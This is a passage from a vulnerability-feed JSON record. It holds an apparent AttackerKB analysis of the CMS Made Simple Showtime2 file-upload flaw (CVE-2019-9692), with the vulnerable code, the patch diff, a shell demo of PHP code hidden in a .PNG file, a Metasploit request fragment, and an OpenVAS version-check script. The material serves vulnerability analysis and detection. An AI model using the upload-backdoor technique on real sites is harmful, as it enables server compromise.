'.php';\n if( !is_file($filename) ) {\n @trigger_error(\"$name is an unknown acton of module \".$this->GetName());\n throw new \\CmsError404Exception(\"Module action not found\");\n }\n \n // these are included in scope in the included file for convenience.\n $gCms = CmsApp::get_instance();\n $db = $gCms->GetDb();\n $config = $gCms->GetConfig();\n $smarty = ( $this->_action_tpl ) ? $this->_action_tpl : $smarty = $gCms->GetSmarty()->get_template_parent();\n include($filename);\n }\n \n\nIf you recall what the exploit is sending in the `mact` parameter, the specific action we should be looking for is `defaultadmin`. So based on the above code, we should be looking at `action.defaultadmin.php` in Showtime2\u2019s directory.\n\nAnd that\u2019s about how much we need to know about the mechanics of CMSMS, let\u2019s move on to the Showtime2 code.\n\n### Debugging Showtime2\u2019s defaultadmin Action\n\nThe most interesting part of the `defaultadmin` action code is of course the upload routine, which occurs almost at the beginning of the file:\n \n \n if( isset($params['upload_submit'])){\n $params = array('active_tab' => 'watermark');\n \n $fieldName=$id.'input_browse';\n \n if (!isset ($_FILES[$fieldName]) || !isset ($_FILES)\n || !is_array ($_FILES[$fieldName]) || !$_FILES[$fieldName]['name']){\n $params['message'] = $this->Lang('error_nofilesuploaded');\n $smarty->assign('message',$this->Lang('error_nofilesuploaded'));\n }else{\n $file = $_FILES[$fieldName];\n // cleanup the filename\n $pos = strrpos($file['name'], '.');\n $alias = substr($file['name'], 0, $pos);\n $alias = preg_replace('/[^a-z0-9-_]+/i','-',$alias);\n $alias = trim($alias . substr($file['name'], $pos), '-');\n $uploadfile = $config['image_uploads_path'].'/'. 
$alias;\n \n if (!@move_uploaded_file($file['tmp_name'], $uploadfile)) {\n $smarty->assign('message',$this->Lang('error_nofilesuploaded'));\n }else{\n chmod($uploadfile, 0644);\n $this->SetPreference(\"watermark_file\", $alias);\n $smarty->assign('message',$this->Lang('file_uploaded'));\n $create_watermark =true;\n }\n }\n }\n \n\nAfter the file is uploaded, it is treated as an image. For example, the next step after the upload is watermarking the image:\n \n \n if ($create_watermark){\n $source_image = '../modules/Showtime2/images/watermark_example_org.jpg';\n $dest_image = '../modules/Showtime2/images/watermark_example_new.jpg';\n if(!showtime2_image::watermark_image($source_image,$dest_image,false)){\n $smarty->assign('message',$this->Lang('watermark_warning'));\n }\n }\n \n\nBut really, there is way to be sure whether the user uploaded is an image or not; the code just assumes it is. This is what allows the attacker to upload whatever they want and leave a backdoor on the target server.\n\nAnd this is how much we need to know about the vulnerability. Now that we know how CMSMS utilizes module interface to load a module, and how our file is uploaded, let\u2019s look at the patch.\n\n## Patch Analysis\n\nAccording to the diff [here](<http://viewsvn.cmsmadesimple.org/diff.php?repname=showtime2&path=%2Ftrunk%2Flib%2Fclass.showtime2_image.php&rev=47>), we know that the patch is implemented in the `watermark_image` function in `class.showtime2_image.php`. 
And it went from the vulnerable code like this (from rev 14)\n \n \n $watermark_file = $mod->GetPreference('watermark_file');\n if ($watermark_file=='watermark.png'){\n $watermark_file = $config['root_path'].'/modules/Showtime2/images/watermark.png';\n }else{\n $watermark_file = $config['image_uploads_path'].'/'.$watermark_file;\n }\n if (!file_exists($watermark_file)) return false;\n \n\nTo this (rev 47, with the log message indicating this is a security fix):\n \n \n $watermark_file = $mod->GetPreference('watermark_file');\n if ($watermark_file=='watermark.png'){\n $watermark_file = $config['root_path'].'/modules/Showtime2/images/watermark.png';\n }else{\n $watermark_file = $config['image_uploads_path'].'/'.$watermark_file;\n }\n $fext = strtoupper(substr($watermark_file, strrpos($watermark_file, '.')));\n if (!in_array($fext,array('.GIF','.JPG','.JPEG','.PNG')))\n unlink($watermark_file);\n if (!file_exists($watermark_file)) return false;\n \n\nSo it looks like the intention of the fix is to check the file extension and make sure the file type is one of these: GIF, JPG, JPEG, and PNG. If there is no match, then it deletes the uploaded file. For the most part, that sounds like a good plan.\n\nA slight concern is that in PHP, you don\u2019t always need the file to be `.php` to be able to execute code, in some cases it could be anything. Take the following proof-of-concept for example, I\u2019m creating a PHP file named as \u201cfake_image.PNG\u201d, and then I include it from a separate file. 
The `include` will still treat the fake image file as a PHP file anyway:\n \n \n root@sinn3r-virtual-machine:/var/www/html# echo \"<?php echo 'Hello World'; ?>\" > fake_image.PNG\n root@sinn3r-virtual-machine:/var/www/html# echo \"<?php include('fake_image.PNG'); ?>\" > demo.php\n root@sinn3r-virtual-machine:/var/www/html# curl http://localhost/demo.php\n Hello World\n \n\nLuckily for the vendor, the exploit doesn\u2019t rely on an `include` to execute the payload; instead it relies on an HTTP request like this:\n \n \n print_status(\"Making request for '/#{fname}' to execute payload.\")\n send_request_cgi(\n {\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'uploads', 'images', fname)\n },\n 15\n )\n \n\nHowever, the ability to upload a PHP file with an image extension name is still worth noting from an attacker\u2019s perspective, because it could potentially be chained with a file inclusion vulnerability in the future.\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-03-11T00:00:00", "type": "attackerkb", "title": "CMS Made Simple (CMSMS) Showtime2 Post Auth Arbitrary File Upload Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9692"], "modified": "2020-02-13T00:00:00", "id": "AKB:EE71C50D-5A60-4738-908D-A92A3ADB937D", "href": "https://attackerkb.com/topics/LxUttAliKO/cms-made-simple-cmsms-showtime2-post-auth-arbitrary-file-upload-vulnerability", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2019-10-09T14:48:57", "description": "CMS Made Simple is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2019-03-12T00:00:00", "type": "openvas", "title": "CMS Made Simple < 2.2.10 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-9058", "CVE-2019-9692", "CVE-2019-9056", "CVE-2019-9055", "CVE-2019-9059", "CVE-2019-9057", "CVE-2019-9693"], "modified": "2019-10-07T00:00:00", "id": "OPENVAS:1361412562310113353", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113353", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113353\");\n script_version(\"2019-10-07T14:34:48+0000\");\n script_tag(name:\"last_modification\", value:\"2019-10-07 14:34:48 +0000 (Mon, 07 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-03-12 13:34:54 +0200 (Tue, 12 Mar 2019)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2019-9692\", \"CVE-2019-9693\", \"CVE-2019-9055\", \"CVE-2019-9056\",\n \"CVE-2019-9057\", \"CVE-2019-9058\", \"CVE-2019-9059\");\n\n script_name(\"CMS Made Simple < 2.2.10 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"cms_made_simple_detect.nasl\");\n script_mandatory_keys(\"cmsmadesimple/installed\");\n\n script_tag(name:\"summary\", value:\"CMS Made Simple is prone to multiple vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The following vulnerabilities exist:\n\n - class.showtime2_image.php does not ensure that a watermark file\n has a standard image file extension\n\n - an authenticated user can achieve SQL Injection in class.showtime2_data.php\n via the functions _updateshow (parameter show_id), _inputshow (parameter show_id),\n _Getshowinfo (parameter show_id), _Getpictureinfo (parameter picture_id),\n _AdjustNameSeq (parameter shownumber), 
_Updatepicture (parameter picture_id)\n and _Deletepicture (parameter picture_id)\n\n - In the module DesignManager (in the files action.admin_bulk_css.php and action.admin_bulk_template.php),\n with an unprivileged user with Designer permissions, it is possible to reach an unserialize call\n with a crafted value in the m1_allparms parameter and achieve object injection\n\n - In the module FrontEndUsers (in the files class.FrontEndUsersManipulate.php and class.FrontEndUsersManipulator.php),\n it is possible to reach an unserialize call with an untrusted __FEU__ cookie and achieve authenticated object injection\n\n - In the module FilePicker, it is possible to reach an unserialize call with an untrusted parameter\n and achieve authenticated object injection\n\n - In the administrator page admin/changegroupperm.php, it is possible to send a crafted value in the sel_groups\n parameter that leads to authenticated object injection\n\n - It is possible, with an administrator account, to achieve command injection by modifying the path of the e-mail executable\n in Mail Settings, setting 'sendmail' in the 'Mailer' option and launching the 'Forgot your password' feature\");\n script_tag(name:\"impact\", value:\"Successful exploitation would allow an attacker to read sensitive information\n and modify the target system.\");\n script_tag(name:\"affected\", value:\"CMS Made Simple through version 2.2.9.\");\n script_tag(name:\"solution\", value:\"Update to version 2.2.10.\");\n\n script_xref(name:\"URL\", value:\"https://forum.cmsmadesimple.org/viewtopic.php?f=1&t=80285\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:cmsmadesimple:cms_made_simple\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! 
version = get_app_version( cpe: CPE, port: port ) ) exit( 0 );\n\nif( version_is_less( version: version, test_version: \"2.2.10\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"2.2.10\" );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}